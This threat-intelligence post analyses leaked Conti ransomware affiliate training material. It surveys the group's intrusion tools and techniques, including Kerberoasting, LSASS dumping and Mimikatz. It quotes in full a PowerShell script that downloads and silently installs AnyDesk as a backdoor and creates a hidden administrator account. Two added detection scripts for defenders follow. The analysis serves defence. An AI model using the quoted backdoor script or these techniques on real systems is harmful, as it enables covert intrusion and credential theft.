Conti Secrets Hacker’s Handbook Leaked

Cyble has obtained the training material that the Conti core team used to train its affiliates to conduct ransomware attacks.

An ex-affiliate of Conti Ransomware released the training material used by the Conti core team to train affiliates to conduct ransomware attacks. A screenshot of the post is shown below.


Figure 1 post by TA

The Threat Actor (TA) claimed that they posted it because Conti did not fully pay them for their work. The ex-affiliate claims to have received only $1500 for all the work they did for Conti.

Below is a screenshot of the claims made by the TA.


Figure 2 claims by TA

In June 2021, Conti had published a post on one of the cybercrime forums in which they appeared to be recruiting penetration testers.


Figure 3 recruiting penetration testers

Upon analyzing the document, we found that the group's basic modus operandi (MO) is simple: the core team manages the malware and maintains the onion websites, while the recruited affiliates are tasked with finding vulnerable networks and encrypting them. Conti also provides training material to its affiliates, including step-by-step techniques for breaking into networks and maintaining access.


Figure 4 CONTI-MO

Below is a screenshot of all the images and files leaked by the ex-affiliate.

Figure 5 Content of ManualsAndSoftware.rar

We have compiled a list of the tools for which Conti has created training material:

  • Cobalt Strike

Cobalt Strike is a security tool created to help penetration testers and red teamers conduct security assessments. Recently, however, cybercriminals have started using this tool because of its rich features and functionality, which range from establishing an initial foothold and performing lateral movement to creating persistence on infected systems. Cybercriminals generally use cracked versions of this tool.

The Conti group has likewise used a cracked version.

Figure 6 CobaltStrike used by Conti Group

  • alias.rc (custom Metasploit resource script file)

This script defines aliases for various auxiliary and post-exploitation modules available in Metasploit. The figure below shows the aliases created in Metasploit by loading it.

Figure 7 Aliases created in Metasploit by using alias.rc resource script

  • Invoke-Kerberoast.ps1

“Invoke-Kerberoast” is a PowerShell tool developed by harmj0y to carry out Kerberoasting attacks. A Kerberoasting attack queries the domain controller for the Service Principal Names (SPNs) registered to service accounts, such as those created for services like SQL.

Once the attacker has the list of SPNs, they can request a Ticket Granting Service (TGS) ticket for each one. Because a TGS ticket is encrypted with the service account's key, the attacker can then use various techniques to export the ticket from the operating system's memory and crack it offline to recover the service account's plaintext password.

Invoke-Kerberoast is an all-in-one tool that covers every step, from querying the domain controller for SPNs to exporting the TGS hash data in a crackable format.
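The TGS requests described above are logged by domain controllers as Windows Security event 4769, which records the requesting account, the service account, and the ticket encryption type. Kerberoasting tools request RC4-encrypted tickets because those crack fastest, so a burst of RC4 (0x17) service-ticket requests from one account for several SPN-bearing service accounts is a useful detection. The script below is an added example (not from the Cyble post or from the Invoke-Kerberoast project) that runs that logic over constructed 4769 records; the field names follow the 4769 event, while the hostnames, accounts, timestamps and threshold values are assumptions chosen for the sample.

```python
"""Flag Kerberoasting candidates from Windows Security event 4769 (TGS request) records.

Added example, not code from the Cyble post. The records below are constructed,
not real telemetry. Each record is a dict carrying the 4769 fields used here:
TargetUserName (requester), ServiceName (account whose SPN was requested),
TicketEncryptionType, IpAddress and TimeCreated.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# TicketEncryptionType 0x17 = RC4-HMAC. Kerberoasting tools ask for RC4 tickets
# because RC4 keys derive directly from the NT hash and are the cheapest to crack.
RC4_HMAC = 0x17

# Constructed sample 4769 events (hypothetical domain, users and IPs).
SAMPLE_EVENTS = [
    {"TimeCreated": "2021-08-05T10:00:01", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"TimeCreated": "2021-08-05T10:00:20", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_http", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"TimeCreated": "2021-08-05T10:00:45", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"TimeCreated": "2021-08-05T10:01:10", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"TimeCreated": "2021-08-05T10:01:31", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sccm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    # Normal AES-encrypted ticket for a service account: not a Kerberoasting signal.
    {"TimeCreated": "2021-08-05T10:05:00", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.40"},
    # A single RC4 request is below the burst threshold (legacy clients still do this).
    {"TimeCreated": "2021-08-05T10:07:12", "TargetUserName": "bjones@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.51"},
    # krbtgt tickets are TGT renewals, never a Kerberoasting target.
    {"TimeCreated": "2021-08-05T10:08:00", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
]


def is_roastable_service(service_name):
    """Computer accounts (name ending in $) have random 120-char passwords and
    krbtgt is the TGT service, so neither is a realistic cracking target."""
    name = service_name.split("@")[0]
    return not name.endswith("$") and name.lower() != "krbtgt"


def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_services=3):
    """Return one alert per (requester, source IP) that asked for RC4 tickets to
    at least `min_services` distinct roastable service accounts within `window`."""
    by_source = defaultdict(list)
    for ev in events:
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if not is_roastable_service(ev["ServiceName"]):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        by_source[key].append((datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    alerts = []
    for (user, ip), requests in by_source.items():
        requests.sort()
        # Sliding window anchored at each request in turn; first hit wins.
        for i, (t0, _) in enumerate(requests):
            services = {svc for t, svc in requests[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts.append({"user": user, "ip": ip, "services": sorted(services)})
                break
    return alerts


if __name__ == "__main__":
    for alert in find_kerberoast_candidates(SAMPLE_EVENTS):
        print(f"Possible Kerberoasting by {alert['user']} from {alert['ip']}: {alert['services']}")
```

On real telemetry the same function can be fed 4769 events exported from the domain controllers' Security log; tune `min_services` and `window` to the environment, and note that moving service accounts to AES-only (or to group managed service accounts) both removes the RC4 signal and blunts the attack itself.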


Figure 8 Invoking Kerberoast PowerShell Tool

  • AdFind

AdFind is a post-exploitation tool, used once the attacker has a foothold on a domain-joined machine. With it, the attacker can enumerate details such as the Active Directory user list, computer list, organizational units, etc.

Figure 9 Executing adfind.exe

  • PowerView

PowerView is another post-exploitation tool, used once the attacker has a foothold in the domain. With it, the attacker can perform multiple tasks, including enumerating the domain controller and extracting details such as SPNs, domain computers, policies, the forest, etc.

  • RouterScan

RouterScan is a scanning tool used to identify router devices in a given range of IPs. It can show details such as the device type and information, Extended Service Set Identifier (ESSID), Basic Service Set Identifier (BSSID), etc. Additionally, the tool tries to log in using a list of standard usernames and passwords built into it.

Figure 10 Running RouterScan tool

  • PowerUpSQL

PowerUpSQL is yet another post-exploitation tool, created to enumerate SQL Server instances. One example of its use is executing a system command on a target MSSQL server through the xp_cmdshell stored procedure present in the MSSQL service.

  • NGROK

In one of the documents, named “RDP NGROK.txt,” the attacker describes how to reach the victim machine over the internet on the Remote Desktop Protocol (RDP) port by tunnelling it through the NGROK service.

  • rundll32.exe

“rundll32.exe” is a Microsoft Windows operating system component. Using “rundll32.exe”, the attacker can call the MiniDump API (Application Programming Interface) function exported by the comsvcs.dll library to generate a dump of the LSASS.exe process. Later, Windows operating system hashes and passwords can be extracted from this dump using tools such as Mimikatz.

  • AnyDesk

The attacker used the PowerShell code below to install AnyDesk as a backdoor, allowing them to control the victim machine from a remote system.

Function AnyDesk {
    mkdir "C:\ProgramData\AnyDesk"
    # Download AnyDesk
    $clnt = new-object System.Net.WebClient
    $url = "http:[//]download[.]anydesk.com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url,$file)
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
    cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
    net user oldadministrator "qc69t4B#Z0kE3" /add
    net localgroup Administrators oldadministrator /ADD
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}

Table 1 PowerShell Code to Install AnyDesk
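Every step of the AnyDesk script above, the comsvcs.dll LSASS dump described under rundll32.exe, and the AdFind enumeration feeding the ad_computers.txt and ad_user.txt files in Table 2 leave a distinctive process command line, which is what endpoint telemetry such as Sysmon Event ID 1 or Security event 4688 records. The script below is an added example (not from the Cyble post or from any of the tools named on this page) that runs simple command-line rules over constructed process-creation records and rolls the hits up per host. The rule names, hostnames, PIDs and file paths are assumptions chosen for the sample; the command-line fragments themselves mirror the playbook steps quoted on this page.

```python
"""Match process-creation command lines against the playbook steps quoted above.

Added example, not code from the Cyble post. The records below are constructed
Sysmon Event ID 1-style events (hostnames, PIDs and paths are invented); the
only fields used are "host" and "CommandLine".
"""

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}

# Each rule: (name, severity, fragments that must ALL appear in the lowercased command line).
# Rule names are invented for this example.
RULES = [
    ("lsass_dump_via_comsvcs", "high",   ["rundll32", "comsvcs.dll", "minidump"]),
    ("anydesk_silent_install", "medium", ["anydesk", "--install", "--silent"]),
    ("anydesk_password_set",   "high",   ["anydesk", "--set-password"]),
    ("hidden_logon_account",   "high",   ["reg", "specialaccounts\\userlist", "/d 0"]),
    ("local_admin_added",      "medium", ["net", "localgroup", "administrators", "/add"]),
    ("adfind_enumeration",     "low",    ["adfind"]),
]

# Constructed sample events. Two hosts show playbook activity; WS03 is benign.
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS01",  "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full"},
    {"host": "WS01",  "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign rundll32 use
    {"host": "SRV02", "CommandLine": r"cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"host": "SRV02", "CommandLine": r"cmd.exe /c echo <password-placeholder> | C:\ProgramData\anydesk.exe --set-password"},
    {"host": "SRV02", "CommandLine": r"net localgroup Administrators oldadministrator /ADD"},
    {"host": "SRV02", "CommandLine": r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f'},
    {"host": "SRV02", "CommandLine": r"cmd.exe /c adfind.exe -f objectcategory=computer > C:\temp\ad_computers.txt"},
    {"host": "WS03",  "CommandLine": r"reg add HKCU\Software\Contoso /v Setting /t REG_DWORD /d 0 /f"},  # benign reg add
]


def match_rules(event):
    """Names of every rule whose fragments all occur in the event's command line."""
    cmd = event.get("CommandLine", "").lower()
    return [name for name, _sev, needles in RULES if all(n in cmd for n in needles)]


def scan(events):
    """One finding per (event, matched rule)."""
    severity_of = {name: sev for name, sev, _ in RULES}
    findings = []
    for ev in events:
        for rule in match_rules(ev):
            findings.append({"host": ev["host"], "rule": rule,
                             "severity": severity_of[rule], "command": ev["CommandLine"]})
    return findings


def summarize_by_host(findings):
    """Roll findings up per host: count, highest severity and the distinct rules hit.
    A host that trips several of these rules together is far more suspicious than
    any single hit, since the playbook chains them."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["host"], {"findings": 0, "max_severity": "low", "rules": set()})
        entry["findings"] += 1
        entry["rules"].add(f["rule"])
        if SEVERITY_RANK[f["severity"]] > SEVERITY_RANK[entry["max_severity"]]:
            entry["max_severity"] = f["severity"]
    for entry in summary.values():
        entry["rules"] = sorted(entry["rules"])
    return summary


if __name__ == "__main__":
    for host, entry in sorted(summarize_by_host(scan(SAMPLE_PROCESS_EVENTS)).items()):
        print(f"{host}: {entry['findings']} finding(s), max severity {entry['max_severity']}, rules {entry['rules']}")
```

The fragment lists are deliberately loose (case-insensitive substring matches), so they survive the path and quoting variations seen in the leaked script; in production the `adfind` and `local_admin_added` rules in particular need allow-listing for legitimate administration, and the comsvcs rule covers only the LSASS-dump variant this page describes.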

  • TOR

The material describes using TOR as a SOCKS proxy to hide the attacker's origin and maintain anonymity.

  • Metasploit

Metasploit is a security tool used by penetration testers, exploit developers, red teamers, etc. It provides a platform containing many exploits for popular services and applications, along with payloads and auxiliary modules for various other security assessment purposes.

  • Additional script/tools/techniques used by Conti

| Sr. No | Script/Tools/Techniques | Description |
|---|---|---|
| 1 | script.sh | Sort details from ad_computers.txt and ad_user.txt generated by AdFind.exe |
| 2 | Hash in ntds.dit | Extracting hashes from the ntds.dit file |
| 3 | netscan | Scan a range of IPs to find shared folders |
| 4 | p.bat | Iterate through the domain.txt file and ping every IP to find which ones are live |
| 5 | sqlcmd utility | Utility used to run SQL commands remotely |
| 6 | net user | Enumerate local users and domain users |
| 7 | wmic | Remotely connect to a machine and execute various commands |
| 8 | Armitage | A GUI for the Metasploit tool |
| 9 | Mimikatz | Extracts hashes and passwords from memory, performs DCSync, etc. |

Table 2 Misc Tools Which are Part of the Conti PlayBook

About Us:

Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit https://cyble.com.
